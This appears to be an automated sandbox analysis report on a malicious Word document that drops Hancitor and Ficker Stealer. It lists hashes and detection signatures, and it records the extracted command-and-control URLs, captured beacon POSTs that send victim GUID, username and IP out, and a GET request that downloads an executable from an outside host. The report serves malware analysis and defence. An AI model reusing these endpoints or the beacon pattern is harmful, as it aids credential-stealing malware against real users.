Windows Analysis Report 0708_3355614568218.doc

Overview

General Information

Sample Name: 0708_3355614568218.doc
Analysis ID: 446230
MD5: 992338b40b38f1f55bd4a9599f70771c
SHA1: 866086438592043aebb88f3da34ad437681a5cb0
SHA256: b4d402b4ab3b5a5568f35562955d5d05357a589ccda55fde5a2c166ef5f15699
Tags: doc, Hancitor, macros, MAN1, Moskalvzapoe, TA511

Detection

Ficker Stealer Hancitor
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Suspect Svchost Activity
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Ficker Stealer
Yara detected Hancitor
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Document contains OLE streams with PE executables
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
May check the online IP address of the machine
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp Malware Configuration Extractor: Hancitor {"Campaign Id": "0707_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}
Multi AV Scanner detection for domain / URL
Source: srand04rf.ru Virustotal: Detection: 13%
Source: pospvisis.com Virustotal: Detection: 12%
Multi AV Scanner detection for submitted file
Source: 0708_3355614568218.doc Virustotal: Detection: 37%
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.rundll32.exe.2110000.6.unpack Avira: Label: TR/Hijacker.Gen

Location Tracking:

Yara detected Hancitor
Source: Yara match File source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2668, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02112CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_02112CD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02112D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_02112D17
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02112D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_02112D98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02112D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_02112D55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02112D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_02112D78
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0040BAB5 CryptUnprotectData, 5_2_0040BAB5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: c:\equate\717\862\Kil\Turn\design.pdb source: rundll32.exe, 00000003.00000002.2346397243.000000000213D000.00000002.00020000.sdmp, 0708_3355614568218.doc

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\nimb.dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: nimb.dll.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\rundll32.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: api.ipify.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 50.19.92.227:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 50.19.92.227:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.22:49172
Source: Traffic Snort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.22:49172 -> 95.213.179.67:80
Source: Traffic Snort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.22:49178
Source: Traffic Snort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.22:49178 -> 95.213.179.67:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://sudepallon.com/8/forum.php
Source: Malware configuration extractor URLs: http://anspossthrly.ru/8/forum.php
Source: Malware configuration extractor URLs: http://thentabecon.ru/8/forum.php
May check the online IP address of the machine
Source: C:\Windows\SysWOW64\rundll32.exe DNS query: name: api.ipify.org
Source: C:\Windows\SysWOW64\svchost.exe DNS query: name: api.ipify.org
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Server: nginx
  Date: Fri, 09 Jul 2021 01:07:42 GMT
  Content-Type: application/octet-stream
  Content-Length: 272910
  Connection: keep-alive
  Last-Modified: Wed, 09 Jun 2021 16:00:40 GMT
  ETag: "60c0e5a8-42a0e"
  Accept-Ranges: bytes
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 50.19.92.227
Source: Joe Sandbox View IP Address: 77.222.42.67
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SWEB-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
  GET / HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: api.ipify.org
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  POST /8/forum.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: sudepallon.com
  Content-Length: 105
  Cache-Control: no-cache
  Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=0.0.0.0&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected:
  GET /7hfjsdfjks.exe HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: srand04rf.ru
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /?format=xml HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: api.ipify.org
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  POST /8/forum.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: sudepallon.com
  Content-Length: 112
  Cache-Control: no-cache
  Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
